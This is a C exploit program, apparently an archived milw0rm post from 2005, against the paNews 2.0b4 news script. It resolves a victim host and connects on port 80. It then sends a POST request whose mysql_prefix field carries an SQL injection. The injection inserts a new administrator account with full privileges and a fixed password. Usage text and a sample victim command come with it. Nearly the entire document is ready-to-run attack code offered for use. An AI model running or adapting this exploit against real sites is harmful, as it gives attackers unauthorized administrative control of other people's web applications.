paNews 2.0b4 - Remote Admin Creation SQL Injection

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <sys/types.h>
5. #include <sys/socket.h>
6. #include <netinet/in.h>
7. #include <netdb.h>
8.  
9. #define PORT 80                 // port of the web server
10.  
11. void info(void);
12. void sendxpl(int sock, char *argv[]);
13. void errsock(void);
14. void errgeth(void);
15. void errconn(void);
16.  
17. int main(int argc, char *argv[]){
18.  
19. int sock, sockconn;
20. struct sockaddr_in addr;
21. struct hostent *hp;
22.  
23. if(argc!=4)
24.   info();
25.  
26. if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
27.   errsock();
28.  
29. system("clear");
30. printf("[*] Creating socket             [OK]\n");
31.  
32. if((hp = gethostbyname(argv[1])) == NULL)
33.   errgeth();
34.  
35. printf("[*] Resolving victim host       [OK]\n");
36.  
37. memset(&addr,0,sizeof(addr));
38. memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
39. addr.sin_family = AF_INET;
40. addr.sin_port = htons(PORT);
41.  
42. sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
43. if(sockconn < 0)
44.   errsock();
45.  
46. printf("[*] Connecting at victim host   [OK]\n");
47.  
48. sendxpl(sock, argv);
49.  
50. printf("[*] Now check on\n"
51.       "    http://%s%s\n\n"
52.       "    your username: %s\n"
53.       "    with password: anacron\n\n",argv[1],argv[2],argv[3]);
54.  
55. shutdown(sock, 2);
56. close(sock);
57.  
58. return(0);
59.  
60. }
61.  
62. void info(void){
63.  
64. system("clear");
65. printf("#########################################\n"
66.       "# paNews v2.0b4 exploit                 #\n"
67.       "#########################################\n"
68.       "# this exploit create a new user admin  #\n"
69.       "# on paNews software system.            #\n"
70.       "# pastebin coded by Aluf                #\n"
71.       "#########################################\n\n"
72.       "[usage]\n\n"
73.       " silePNEWSxpl <victim> <path_paNews> <username>\n\n"
74.       "[example]\n\n"
75.       " silePNEWSxpl www.victim.com /panews/index.php silentium\n\n");
76. exit(1);
77.  
78. }
79.  
80. void sendxpl(int sock, char *argv[]){
81.  
82. FILE *out;
83. int size = 264;
84. out = fdopen(sock,"a");
85. setbuf(out,NULL);
86.  
87. size+=(strlen(argv[3]) * 2);
88.  
89. fprintf(out,"POST %s HTTP/1.0\n"
90.            "Connection: Keep-Alive\n"
91.            "Pragma: no-cache\n"
92.            "Cache-control: no-cache\n"
93.            "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
94.            "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
95.            "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
96.            "Accept-Language: en\n"
97.            "Host: %s\n"
98.            "Referer: http://%s%s\n"
99.            "Content-Type: application/x-www-form-urlencoded\n"
100.            "Content-Length: %d\n\n"
101.            "action%%3Dlogin%%26username%%3D%s%%26password%%3Danacron%%26"
102.            "mysql_prefix%%3Dpanews_auth%%60%%20VALUES%%20(%%22%%22,%%22"
103.            "%s%%22,%%22f63140655b379e65f6cd87fa3c3da631%%22,%%22"
104.            "hackit%%22,%%22admins%%7Ccat%%7Ccomment%%7Cnewsadd%%7Cnewsedit"
105.            "%%7Cprefset%%7Csetup%%22,%%22none%%22,%%22127.0.0.1%%22"
106.            ",1,1)%%00\n\n",argv[2],argv[1],argv[1],argv[2],size,argv[3],argv[3]);
107.  
108.            printf("[*] Sending exploit         [OK]\n\n");
109.  
110. }
111.  
112. void errsock(void){
113.  
114. system("clear");
115. printf("[x] Creating socket             [FAILED]\n\n");
116. exit(1);
117.  
118. }
119.  
120. void errgeth(void){
121.  
122. printf("[x] Resolving victim host        [FAILED]\n\n");
123. exit(1);
124.  
125. }
126.  
127. void errconn(void){
128.  
129. printf("[x] Connecting at victim host    [FAILED]\n\n");
130. exit(1);
131.  
132. }
133.  
134. // milw0rm.com [2005-03-08]